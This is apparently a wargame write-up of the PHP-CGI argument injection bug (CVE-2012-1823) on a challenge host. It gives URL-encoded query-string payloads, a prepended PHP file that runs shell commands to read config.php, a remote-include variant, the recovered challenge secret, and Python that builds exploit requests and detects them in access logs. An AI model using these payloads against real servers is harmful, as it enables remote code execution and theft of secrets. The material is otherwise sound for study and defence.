The specific vulnerability is CVE-2012-1823 (PHP-CGI argument injection leading to RCE).
Parameters appended to the URL's query string are passed straight through to php-cgi as command-line arguments.
For example, index.php?-s
is equivalent to running /usr/bin/php53-cgi/php-cgi -f index.php -s
The output of php-cgi --help is as follows:
Usage: php-cgi [-q] [-h] [-s] [-v] [-i] [-f <file>]
       php-cgi <file> [args...]
  -a               Run interactively
  -b <address:port>|<port> Bind Path for external FASTCGI Server mode
  -C               Do not chdir to the script's directory
  -c <path>|<file> Look for php.ini file in this directory
  -n               No php.ini file will be used
  -d foo[=bar]     Define INI entry foo with value 'bar'
  -e               Generate extended information for debugger/profiler
  -f <file>        Parse <file>.  Implies `-q'
  -h               This help
  -i               PHP information
  -l               Syntax check only (lint)
  -m               Show compiled in modules
  -q               Quiet-mode.  Suppress HTTP Header output.
  -s               Display colour syntax highlighted source.
  -v               Version number
  -w               Display source with stripped comments and whitespace.
  -z <file>        Load Zend extension <file>.
  -T <count>       Measure execution time of script repeated <count> times.
http://rce.warchall.net/?-s
This shows the source code of index.php: with -s, php-cgi prints the syntax-highlighted source instead of executing the script.
It contains the statement: require '../config.php';
Next we need a way to read that file.
The absolute path of index.php is /home/level/20_live_rce/www/index.php
The absolute path of ../config.php is /home/level/20_live_rce/config.php
We need a way to output the source of config.php.
Among the php-cgi options:
  -d foo[=bar]     Define INI entry foo with value 'bar'
We use it to set two INI entries from the command line:
-dallow_url_include=On
-dauto_prepend_file=/tmp/2.php
auto_prepend_file makes php-cgi include the named file before index.php, so whatever it contains runs with the web server's privileges. allow_url_include only matters when the prepended file is a URL (a remote http:// file or php://input) rather than a local path such as /tmp/2.php; here it is harmless but not actually needed.
Create 2.php in /tmp with the following content:
<?php exec("cat /home/level/20_live_rce/config.php",$out); print_r($out); ?>
Submit the URL (the /tmp/2.php in it can be replaced by a file hosted on your own server, e.g. http://xxx.xxx/1.txt; that is the case where allow_url_include=On is actually required):
http://rce.warchall.net/?-dallow_url_include=On+-dauto_prepend_file=/tmp/2.php+-n
URL-encoded:
http://rce.warchall.net/?-dallow_url_include%3DOn+-dauto_prepend_file%3D%2ftmp%2f2.php+-n
The encoding is not cosmetic: a CGI server only hands the query string to the program as command-line arguments (split on '+') when it contains no literal '='. With '=' encoded as %3D the query still qualifies, and php-cgi receives -dallow_url_include=On, -dauto_prepend_file=/tmp/2.php and -n as argv. The trailing -n tells php-cgi not to load php.ini, so restrictions a hardened php.ini would impose (disable_functions, for example) do not apply to this run.
We obtain the source of ../config.php:
Array ( [0] => define('ICANHAZRCE', 'StrongGard_6_3'); [2] => return ICANHAZRCE; [3] => ?> )
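As an added example (not code from the original write-up or from the challenge site), the following Python models both sides of the bug: how a CGI server turns an "indexed" query string into php-cgi argv, how to build the request used above (plus the php://input variant that needs no file on the target), and a detection check over a few access-log lines. The base URL reuses the write-up's host; the log lines, the IPs and the timestamps in them are constructed for the example, and nothing is sent over the network.

```python
# Added example, not part of the original write-up. Models CVE-2012-1823:
# query string -> php-cgi argv, request construction, and log-based detection.
import re
from urllib.parse import quote, unquote, urlsplit


def cgi_argv_from_query(query: str) -> list:
    """Simulate the CGI indexed-query rule (RFC 3875, section 4.4).

    If the query string contains no unencoded '=', the server splits it on
    '+', percent-decodes each word and passes the words to the CGI program as
    command-line arguments. php-cgi before 5.3.12 / 5.4.2 then parses those
    words as its own options (-s, -d, -n, ...), which is the bug.
    """
    if "=" in query:
        return []  # ordinary form query: delivered via QUERY_STRING only
    return [unquote(word) for word in query.split("+") if word]


def build_cgi_query(args: list) -> str:
    """Encode php-cgi arguments so they survive the indexed-query rule.

    Every '=' (and '/', ':') is percent-encoded so the query still has no
    literal '=', and arguments are joined with '+', the CGI word separator.
    """
    return "+".join(quote(arg, safe="") for arg in args)


def local_prepend_url(base: str, prepend_path: str) -> str:
    """URL that prepends a file already on the target, as in the write-up.
    allow_url_include is not needed for a local path; kept to match the page."""
    args = ["-dallow_url_include=On", "-dauto_prepend_file=" + prepend_path, "-n"]
    return base + "?" + build_cgi_query(args)


def php_input_request(base: str, php_code: str) -> tuple:
    """Variant needing no file on the target: prepend php://input and ship the
    PHP payload as the POST body. Here allow_url_include=On is required.
    Returns (url, body); the caller decides whether to send it."""
    args = ["-dallow_url_include=On", "-dauto_prepend_file=php://input", "-n"]
    return base + "?" + build_cgi_query(args), php_code


def is_cgi_arg_injection(query: str) -> bool:
    """Detection predicate: an indexed query containing a word that starts
    with '-' would reach php-cgi as an option. Block or alert on it."""
    return any(word.startswith("-") for word in cgi_argv_from_query(query))


# Constructed access-log lines (Apache common-log style) for the demo.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [10/May/2012:10:00:01 +0000] "GET /index.php?-s HTTP/1.1" 200 812',
    '203.0.113.5 - - [10/May/2012:10:00:07 +0000] "GET /?-dallow_url_include%3DOn+-dauto_prepend_file%3D%2ftmp%2f2.php+-n HTTP/1.1" 200 94',
    '198.51.100.9 - - [10/May/2012:10:00:09 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120',
    '198.51.100.9 - - [10/May/2012:10:00:11 +0000] "GET /search.php?q=foo+-bar HTTP/1.1" 200 100',
    '198.51.100.9 - - [10/May/2012:10:00:13 +0000] "GET /index.php?debug HTTP/1.1" 200 5120',
]

_REQ_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def suspicious_requests(log_lines) -> list:
    """Return the request targets whose query string would reach php-cgi as
    option-looking argv words (benign '?q=foo+-bar' has a literal '=' and
    is not indexed, so it is not flagged)."""
    hits = []
    for line in log_lines:
        m = _REQ_LINE.search(line)
        if not m:
            continue
        target = m.group(1)
        if is_cgi_arg_injection(urlsplit(target).query):
            hits.append(target)
    return hits


if __name__ == "__main__":
    print(local_prepend_url("http://rce.warchall.net/", "/tmp/2.php"))
    print(cgi_argv_from_query("-dallow_url_include%3DOn+-dauto_prepend_file%3D%2ftmp%2f2.php+-n"))
    for target in suspicious_requests(SAMPLE_ACCESS_LOG):
        print("suspicious:", target)
```

The detection predicate is the same rule the well-known rewrite-based mitigation applies at the web server (reject query strings with no '=' that contain a dash); the real fix is php-cgi 5.3.12 / 5.4.2 or later, since -n sidesteps anything php.ini alone could enforce.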